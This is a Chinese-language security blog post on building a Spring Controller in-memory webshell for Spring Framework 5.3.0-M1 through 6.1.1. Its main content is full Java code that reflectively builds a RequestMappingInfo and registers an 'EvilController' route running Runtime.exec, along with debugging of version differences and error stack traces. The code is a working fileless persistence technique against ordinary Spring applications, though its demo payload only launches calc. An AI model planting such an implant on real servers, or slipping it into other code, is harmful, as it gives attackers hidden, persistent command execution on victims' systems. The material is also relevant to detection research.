Je Yiuwai's Blog
文章 标签 分类
Je Yiuwai's Blog

Spring Controller 内存马构造

Je Yiuwai  收录于  类别 赛博安全
     约 2220 字  预计阅读 5 分钟 
警告
本文最后更新于 2023-12-18,文中内容可能已过时。

Spring Controller 内存马构造

使用 IDEA 默认创建的 Spring Web 项目的。

image-20231213115406373

JDK 17;Spring Boot Starter Web » 3.1.5

v5.3.0-M1 -> v6.1.1

同一路径重复注入有问题;

mappingHandlerMapping.registerMapping(mapping, handler, method);

我们将利用这行代码去注入我们的恶意类方法和路由的映射,mapping 是关于映射的对象,handler 就是这个恶意类,method 就是恶意类里面的恶意方法。

package com.example.springshell;

import jakarta.servlet.http.HttpServletRequest;
import jakarta.servlet.http.HttpServletResponse;
import org.springframework.lang.Nullable;
import org.springframework.stereotype.Controller;
import org.springframework.util.Assert;
import org.springframework.util.StringUtils;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.servlet.mvc.condition.*;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import org.springframework.web.util.pattern.PathPatternParser;

import java.io.IOException;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;

@Controller
@RequestMapping("/exec")
public class ExecController {

    @GetMapping
    public void Test(HttpServletRequest request, HttpServletResponse response) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException {
        // get mappingHandlerMapping
        WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
        RequestMappingHandlerMapping mappingHandlerMapping = (RequestMappingHandlerMapping) context.getBean("requestMappingHandlerMapping");

        // public RequestMappingInfo(@Nullable String name, @Nullable PatternsRequestCondition patterns,
        // @Nullable RequestMethodsRequestCondition methods, @Nullable ParamsRequestCondition params,
        // @Nullable HeadersRequestCondition headers, @Nullable ConsumesRequestCondition consumes,
        // @Nullable ProducesRequestCondition produces, @Nullable RequestCondition<?> custom)

        // 1.1 - mapping - wrong
        PatternsRequestCondition patternsRequestCondition = new PatternsRequestCondition("/ikun");
        RequestMethodsRequestCondition requestMethodsRequestCondition = new RequestMethodsRequestCondition(RequestMethod.GET);

        RequestMappingInfo mapping = new RequestMappingInfo(patternsRequestCondition,requestMethodsRequestCondition,null,null,null,null,null);

        // 1.2 - handler
        EvilController handler = new EvilController();

        // 1.3 - method
        try {
            Method method = EvilController.class.getMethod("evilMethod");
            // 2 - register
            mappingHandlerMapping.registerMapping(mapping, handler, method);
        } catch (NoSuchMethodException e) {
            throw new RuntimeException(e);
        }

    }

    public class EvilController {
        public EvilController() {
            System.out.println("init success");
        }

        public void evilMethod() throws IOException {
            Runtime.getRuntime().exec("calc");
        }
    }
}

这个注入之后会报错:

java.lang.IllegalArgumentException: Expected lookupPath in request attribute "org.springframework.web.util.UrlPathHelper.PATH".
	at org.springframework.util.Assert.notNull(Assert.java:222) ~[spring-core-6.0.13.jar:6.0.13]
	at org.springframework.web.util.UrlPathHelper.getResolvedLookupPath(UrlPathHelper.java:208) ~[spring-web-6.0.13.jar:6.0.13]
	at org.springframework.web.servlet.mvc.condition.PatternsRequestCondition.getMatchingCondition(PatternsRequestCondition.java:280) ~[spring-webmvc-6.0.13.jar:6.0.13]
	at org.springframework.web.servlet.mvc.method.RequestMappingInfo.getMatchingCondition(RequestMappingInfo.java:414) ~[spring-webmvc-6.0.13.jar:6.0.13]
	at org.springframework.web.servlet.mvc.method.RequestMappingInfoHandlerMapping.getMatchingMapping(RequestMappingInfoHandlerMapping.java:110) ~[spring-webmvc-6.0.13.jar:6.0.13]
	at org.springframework.web.servlet.mvc.method.RequestMappingInfoHandlerMapping.getMatchingMapping(RequestMappingInfoHandlerMapping.java:68) ~[spring-webmvc-6.0.13.jar:6.0.13]
	at org.springframework.web.servlet.handler.AbstractHandlerMethodMapping.addMatchingMappings(AbstractHandlerMethodMapping.java:447) ~[spring-webmvc-6.0.13.jar:6.0.13]
	at org.springframework.web.servlet.handler.AbstractHandlerMethodMapping.lookupHandlerMethod(AbstractHandlerMethodMapping.java:404) ~[spring-webmvc-6.0.13.jar:6.0.13]
	......

最终发现问题在于 RequestMappingInfo 的构造有问题,拿一个正常的 Controller 的 mapping 来对比一下就知道问题在哪里了。

org.springframework.web.servlet.handler.AbstractHandlerMethodMapping#addMatchingMappings 中,参数 mappings 就是我们想查看的对象。

注意:

这里调试分析的需要注意,这里需要在 org.springframework.web.servlet.DispatcherServlet#getHandler 的位置下断点,等待循环到 RequestMappingHandlerMapping 才步入进去。

image-20231213142902572

image-20231213142523156

这里我们明显看到是对象的属性不对,具体是 PathPatternsRequestCondition 这个属性。我们回到我们的代码看到我们的参数并没有 PathPatternsRequestCondition 这个对象。那么我们回到构造 mapping 的构造方法。

image-20231213143502567

很明显,我们找到一个可以设置 PathPatternsRequestCondition 参数的构造方法,设置它为我们的注入的路径就好了。下面这个私有的构造方法就是我们想要的。

image-20231213143706493

重新构造的 mapping 的代码,具体在完整代码中的 1.1 中。

package com.example.springshell;

import jakarta.servlet.http.HttpServletRequest;
import jakarta.servlet.http.HttpServletResponse;
import org.springframework.lang.Nullable;
import org.springframework.stereotype.Controller;
import org.springframework.util.Assert;
import org.springframework.util.StringUtils;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.servlet.mvc.condition.*;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import org.springframework.web.util.pattern.PathPatternParser;

import java.io.IOException;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;

@Controller
@RequestMapping("/exec")
public class ExecController {

    @GetMapping
    public void Test(HttpServletRequest request, HttpServletResponse response) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException {
        // get mappingHandlerMapping
        WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
        RequestMappingHandlerMapping mappingHandlerMapping = (RequestMappingHandlerMapping) context.getBean("requestMappingHandlerMapping");

        //            public RequestMappingInfo(@Nullable String name, @Nullable PatternsRequestCondition patterns,
        //                    @Nullable RequestMethodsRequestCondition methods, @Nullable ParamsRequestCondition params,
        //                    @Nullable HeadersRequestCondition headers, @Nullable ConsumesRequestCondition consumes,
        //                    @Nullable ProducesRequestCondition produces, @Nullable RequestCondition<?> custom)

        // 1.1 - mapping - wrong
//        PatternsRequestCondition patternsRequestCondition = new PatternsRequestCondition("/ikun");
//        RequestMethodsRequestCondition requestMethodsRequestCondition = new RequestMethodsRequestCondition(RequestMethod.GET);
//
//        RequestMappingInfo mapping = new RequestMappingInfo(patternsRequestCondition,requestMethodsRequestCondition,null,null,null,null,null);

        // 1.1 - mapping - correct
        //        	private RequestMappingInfo(@Nullable String name,
        //                @Nullable PathPatternsRequestCondition pathPatternsCondition,
        //                @Nullable PatternsRequestCondition patternsCondition,
        //                RequestMethodsRequestCondition methodsCondition, ParamsRequestCondition paramsCondition,
        //                HeadersRequestCondition headersCondition, ConsumesRequestCondition consumesCondition,
        //                ProducesRequestCondition producesCondition, RequestConditionHolder customCondition,
        //                RequestMappingInfo.BuilderConfiguration options)

        Constructor<?> requestMappingInfoConstructor = null;
        try {
            Class<?> requestMappingInfoClass = Class.forName("org.springframework.web.servlet.mvc.method.RequestMappingInfo");
            requestMappingInfoConstructor = requestMappingInfoClass.getDeclaredConstructor(String.class, PathPatternsRequestCondition.class, PatternsRequestCondition.class,
                    RequestMethodsRequestCondition.class, ParamsRequestCondition.class,
                    HeadersRequestCondition.class, ConsumesRequestCondition.class,
                    ProducesRequestCondition.class, RequestConditionHolder.class,
                    RequestMappingInfo.BuilderConfiguration.class);
            requestMappingInfoConstructor.setAccessible(true);
        } catch (Exception e) {
            System.out.println("here");
            e.printStackTrace();
        }

        PathPatternsRequestCondition pathPatternsRequestCondition = new PathPatternsRequestCondition(new PathPatternParser(), "/ikun");

        RequestMappingInfo mapping = (RequestMappingInfo) requestMappingInfoConstructor
                .newInstance(null,
                        pathPatternsRequestCondition,
                        null,
                        new RequestMethodsRequestCondition(),
                        new ParamsRequestCondition(),
                        new HeadersRequestCondition(),
                        new ConsumesRequestCondition(),
                        new ProducesRequestCondition(),
                        new RequestConditionHolder(null),
                        new RequestMappingInfo.BuilderConfiguration()
                );

        // 1.2 - handler
        EvilController handler = new EvilController();

        // 1.3 - method
        try {
            Method method = EvilController.class.getMethod("evilMethod");
            // 2 - register
            mappingHandlerMapping.registerMapping(mapping, handler, method);
        } catch (NoSuchMethodException e) {
            throw new RuntimeException(e);
        }

    }

    public class EvilController {
        public EvilController() {
            System.out.println("init success");
        }

        public void evilMethod() throws IOException {
            Runtime.getRuntime().exec("calc");
        }
    }
}

为什么会出现上面这个问题,由于代码完全是个人手写,在搜索问题的过程中我去对比了目前公开的 Controller 内存马。我发现大多数构造 Controller 内存马的 mapping 对象的代码就是使用这个构造方法。

RequestMappingInfo mapping = new RequestMappingInfo(patternsRequestCondition,requestMethodsRequestCondition,null,null,null,null,null);

首先我先怀疑的是版本的问题导致了 mapping 对象加入了检查发生了报错,检查代码报错的位置就在报错中。根据之前的报错调用栈我找到了报错的具体位置,在 org.springframework.web.servlet.mvc.method.RequestMappingInfo#getMatchingCondition

我找到 v5.0.0.RELEASE 拿来和现在我分析的 6.0.13 对比(绿色是新版本的添加),之前不会拿 PathPatternsRequestCondition 这个属性来做操作,那么这样就说的通了,就是版本不同的代码差异问题,到时候适配不同版本的时候可以回头来查看。

image-20231213150021720

终于被我找到是在哪次提交中,在 Support for parsed PathPatterns in Spring MVC

image-20231213151937205

就是在这次提交,添加了这个私有的构造方法和在 getMatchingCondition 中添加相关的代码。

分别在

https://github.com/spring-projects/spring-framework/commit/5225a5741197a7e2123437709c2468e4537b0469#diff-15bc1d588f8e9b7bde652ff4f98bf684e29d3033c6546b1aad082e853eec810eR154

https://github.com/spring-projects/spring-framework/commit/5225a5741197a7e2123437709c2468e4537b0469#diff-15bc1d588f8e9b7bde652ff4f98bf684e29d3033c6546b1aad082e853eec810eR390

image-20231213152444169

image-20231213152507685

这个修改的版本是 v5.3.0-M1,也就是说这次的内存马理论上适配 v5.3.0-M1 -> v6.1.1。

终于可以注入和使用 Webshell 进行命令执行之后,存在以下几个情况的报错。

  1. 重复注入后会报错(已解决);
  2. 通过浏览器请求的时候会报错;
  3. 通过 CURL 请求的时候会报错(和第二点的报错不一样);

第一个报错很好解决,try 语句不打印报错即可,重复注入不影响功能。

第二个报错的内容是:

2023-12-14T10:48:07.219+08:00 ERROR 37376 --- [nio-8080-exec-4] o.a.c.c.C.[.[.[/].[dispatcherServlet]    : Servlet.service() for servlet [dispatcherServlet] in context with path [] threw exception [Circular view path [ikun]: would dispatch back to the current handler URL [/ikun] again. Check your ViewResolver setup! (Hint: This may be the result of an unspecified view, due to default view name generation.)] with root cause

jakarta.servlet.ServletException: Circular view path [ikun]: would dispatch back to the current handler URL [/ikun] again. Check your ViewResolver setup! (Hint: This may be the result of an unspecified view, due to default view name generation.)
	at org.springframework.web.servlet.view.InternalResourceView.prepareForRendering(InternalResourceView.java:210) ~[spring-webmvc-6.0.13.jar:6.0.13]
	at org.springframework.web.servlet.view.InternalResourceView.renderMergedOutputModel(InternalResourceView.java:148) ~[spring-webmvc-6.0.13.jar:6.0.13]
	at org.springframework.web.servlet.view.AbstractView.render(AbstractView.java:314) ~[spring-webmvc-6.0.13.jar:6.0.13]
	at org.springframework.web.servlet.DispatcherServlet.render(DispatcherServlet.java:1415) ~[spring-webmvc-6.0.13.jar:6.0.13]
	at org.springframework.web.servlet.DispatcherServlet.processDispatchResult(DispatcherServlet.java:1159) ~[spring-webmvc-6.0.13.jar:6.0.13]
	at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:1098) ~[spring-webmvc-6.0.13.jar:6.0.13]
	at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:974) ~[spring-webmvc-6.0.13.jar:6.0.13]
	at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:1011) ~[spring-webmvc-6.0.13.jar:6.0.13]
	at org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:903) ~[spring-webmvc-6.0.13.jar:6.0.13]
	at jakarta.servlet.http.HttpServlet.service(HttpServlet.java:564) ~[tomcat-embed-core-10.1.15.jar:6.0]
	at org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:885) ~[spring-webmvc-6.0.13.jar:6.0.13]
	at jakarta.servlet.http.HttpServlet.service(HttpServlet.java:658) ~[tomcat-embed-core-10.1.15.jar:6.0]
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:205) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:51) ~[tomcat-embed-websocket-10.1.15.jar:10.1.15]
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:100) ~[spring-web-6.0.13.jar:6.0.13]
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:116) ~[spring-web-6.0.13.jar:6.0.13]
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:93) ~[spring-web-6.0.13.jar:6.0.13]
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:116) ~[spring-web-6.0.13.jar:6.0.13]
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.springframework.web.filter.ServerHttpObservationFilter.doFilterInternal(ServerHttpObservationFilter.java:109) ~[spring-web-6.0.13.jar:6.0.13]
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:116) ~[spring-web-6.0.13.jar:6.0.13]
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:201) ~[spring-web-6.0.13.jar:6.0.13]
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:116) ~[spring-web-6.0.13.jar:6.0.13]
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:167) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:90) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:482) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:115) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:93) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:74) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:340) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:391) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:63) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:896) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1744) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:52) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at java.base/java.lang.Thread.run(Thread.java:833) ~[na:na]

2023-12-14T10:48:07.264+08:00 ERROR 37376 --- [nio-8080-exec-4] s.e.ErrorMvcAutoConfiguration$StaticView : Cannot render error page for request [/ikun] as the response has already been committed. As a result, the response may have the wrong status code.

看起来是视图解析器的配置的问题,在调试之前验证一下,思路就是找一个已经存在 View 的路径下面注入,例如 /error 是本身存在的路径而且是有视图解析器的正确配置的,那么我们注入 /error/ikun

顺着这个思路发现注入 //ikun 也不会有报错。再试试 ikun,这个倒是和原来一样会报错。

突然发现第三点问题也直接迎刃而解了。这里猜测我们假如使用的是 RestController 的注解注册流程的话,应该也不会报错了。

Debug 分析发现在 org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod#invokeAndHandle 处无法进入这个分支。原因是 returnValue 应该是 null 然后进入分支的。(暂时不分析解决)

image-20231214115800044

第三个报错如下:

jakarta.servlet.ServletException: Request processing failed: java.lang.IllegalStateException: getWriter() has already been called for this response
	at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:1019) ~[spring-webmvc-6.0.13.jar:6.0.13]
	at org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:903) ~[spring-webmvc-6.0.13.jar:6.0.13]
	at jakarta.servlet.http.HttpServlet.service(HttpServlet.java:564) ~[tomcat-embed-core-10.1.15.jar:6.0]
	at org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:885) ~[spring-webmvc-6.0.13.jar:6.0.13]
	at jakarta.servlet.http.HttpServlet.service(HttpServlet.java:658) ~[tomcat-embed-core-10.1.15.jar:6.0]
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:205) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:100) ~[spring-web-6.0.13.jar:6.0.13]
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:116) ~[spring-web-6.0.13.jar:6.0.13]
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:101) ~[spring-web-6.0.13.jar:6.0.13]
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:101) ~[spring-web-6.0.13.jar:6.0.13]
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:642) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.core.ApplicationDispatcher.doInclude(ApplicationDispatcher.java:520) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.core.ApplicationDispatcher.include(ApplicationDispatcher.java:463) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.core.StandardHostValve.custom(StandardHostValve.java:343) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.core.StandardHostValve.status(StandardHostValve.java:222) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.core.StandardHostValve.throwable(StandardHostValve.java:308) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:149) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:93) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:74) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:340) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:391) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:63) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:896) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1744) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:52) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at java.base/java.lang.Thread.run(Thread.java:833) ~[na:na]
Caused by: java.lang.IllegalStateException: getWriter() has already been called for this response
	at org.apache.catalina.connector.Response.getOutputStream(Response.java:518) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at org.apache.catalina.connector.ResponseFacade.getOutputStream(ResponseFacade.java:179) ~[tomcat-embed-core-10.1.15.jar:10.1.15]
	at jakarta.servlet.ServletResponseWrapper.getOutputStream(ServletResponseWrapper.java:100) ~[tomcat-embed-core-10.1.15.jar:6.0]
	at org.springframework.http.server.ServletServerHttpResponse.getBody(ServletServerHttpResponse.java:97) ~[spring-web-6.0.13.jar:6.0.13]
	at org.springframework.http.converter.json.AbstractJackson2HttpMessageConverter.writeInternal(AbstractJackson2HttpMessageConverter.java:451) ~[spring-web-6.0.13.jar:6.0.13]
	at org.springframework.http.converter.AbstractGenericHttpMessageConverter.write(AbstractGenericHttpMessageConverter.java:103) ~[spring-web-6.0.13.jar:6.0.13]
	at org.springframework.web.servlet.mvc.method.annotation.AbstractMessageConverterMethodProcessor.writeWithMessageConverters(AbstractMessageConverterMethodProcessor.java:297) ~[spring-webmvc-6.0.13.jar:6.0.13]
	at org.springframework.web.servlet.mvc.method.annotation.HttpEntityMethodProcessor.handleReturnValue(HttpEntityMethodProcessor.java:245) ~[spring-webmvc-6.0.13.jar:6.0.13]
	at org.springframework.web.method.support.HandlerMethodReturnValueHandlerComposite.handleReturnValue(HandlerMethodReturnValueHandlerComposite.java:78) ~[spring-web-6.0.13.jar:6.0.13]
	at org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:136) ~[spring-webmvc-6.0.13.jar:6.0.13]
	at org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:884) ~[spring-webmvc-6.0.13.jar:6.0.13]
	at org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:797) ~[spring-webmvc-6.0.13.jar:6.0.13]
	at org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:87) ~[spring-webmvc-6.0.13.jar:6.0.13]
	at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:1081) ~[spring-webmvc-6.0.13.jar:6.0.13]
	at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:974) ~[spring-webmvc-6.0.13.jar:6.0.13]
	at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:1011) ~[spring-webmvc-6.0.13.jar:6.0.13]
	... 35 common frames omitted

(暂时不分析解决)

更新于 2023-12-18
 Spring Webshell
返回 | 主页